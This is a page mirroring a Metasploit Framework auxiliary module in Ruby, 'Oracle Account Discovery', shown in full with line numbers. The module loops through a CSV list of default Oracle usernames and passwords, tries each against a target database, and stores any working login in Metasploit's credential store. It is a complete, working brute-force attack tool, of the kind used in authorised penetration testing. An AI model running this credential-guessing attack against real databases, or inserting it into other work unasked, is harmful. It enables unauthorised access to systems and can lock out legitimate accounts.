CoCalc -- oracle

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/oracle/oracle_login.rb
¹⁹⁵⁹² views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'csv'
7

8
class MetasploitModule < Msf::Auxiliary
9
  include Msf::Auxiliary::Report
10
  include Msf::Exploit::ORACLE
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'Oracle Account Discovery',
17
        'Description' => %q{
18
          This module uses a list of well known default authentication credentials
19
          to discover easily guessed accounts.
20
        },
21
        'Author' => [ 'MC' ],
22
        'License' => MSF_LICENSE,
23
        'References' => [
24
          [ 'URL', 'http://www.petefinnigan.com/default/oracle_default_passwords.csv' ],
25
          [ 'URL', 'https://seclists.org/fulldisclosure/2009/Oct/261' ],
26
        ],
27
        'DisclosureDate' => '2008-11-20',
28
        'Notes' => {
29
          'Stability' => [CRASH_SAFE],
30
          'SideEffects' => [IOC_IN_LOGS, ACCOUNT_LOCKOUTS],
31
          'Reliability' => []
32
        }
33
      )
34
    )
35

36
    register_options(
37
      [
38
        OptPath.new('CSVFILE', [ false, 'The file that contains a list of default accounts.', File.join(Msf::Config.install_root, 'data', 'wordlists', 'oracle_default_passwords.csv')]),
39
      ]
40
    )
41

42
    deregister_options('DBUSER', 'DBPASS')
43
  end
44

45
  def report_cred(opts)
46
    service_data = {
47
      address: opts[:ip],
48
      port: opts[:port],
49
      service_name: opts[:service_name],
50
      protocol: 'tcp',
51
      workspace_id: myworkspace_id
52
    }
53

54
    credential_data = {
55
      origin_type: :service,
56
      module_fullname: fullname,
57
      username: opts[:user],
58
      private_data: opts[:password],
59
      private_type: :password
60
    }.merge(service_data)
61

62
    login_data = {
63
      last_attempted_at: Time.now,
64
      core: create_credential(credential_data),
65
      status: Metasploit::Model::Login::Status::SUCCESSFUL
66
    }.merge(service_data)
67

68
    create_credential_login(login_data)
69
  end
70

71
  def run
72
    return if !check_dependencies
73

74
    list = datastore['CSVFILE']
75

76
    print_status("Starting brute force on #{datastore['RHOST']}:#{datastore['RPORT']}...")
77

78
    CSV.foreach(list) do |brute|
79
      datastore['DBUSER'] = brute[2].downcase
80
      datastore['DBPASS'] = brute[3].downcase
81

82
      begin
83
        connect
84
        disconnect
85
      rescue ::OCIError => e
86
        if e.to_s =~ /^ORA-12170:\s/
87
          print_error("#{datastore['RHOST']}:#{datastore['RPORT']} Connection timed out")
88
          break
89
        else
90
          vprint_error("#{datastore['RHOST']}:#{datastore['RPORT']} - LOGIN FAILED: #{datastore['DBUSER']}: #{e})")
91
        end
92
      else
93
        report_cred(
94
          ip: datastore['RHOST'],
95
          port: datastore['RPORT'],
96
          service_name: 'oracle',
97
          user: "#{datastore['SID']}/#{datastore['DBUSER']}",
98
          password: datastore['DBPASS']
99
        )
100
        print_good("Found user/pass of: #{datastore['DBUSER']}/#{datastore['DBPASS']} on #{datastore['RHOST']} with sid #{datastore['SID']}")
101
      end
102
    end
103
  end
104
end
105

106
Product

Resources

Company
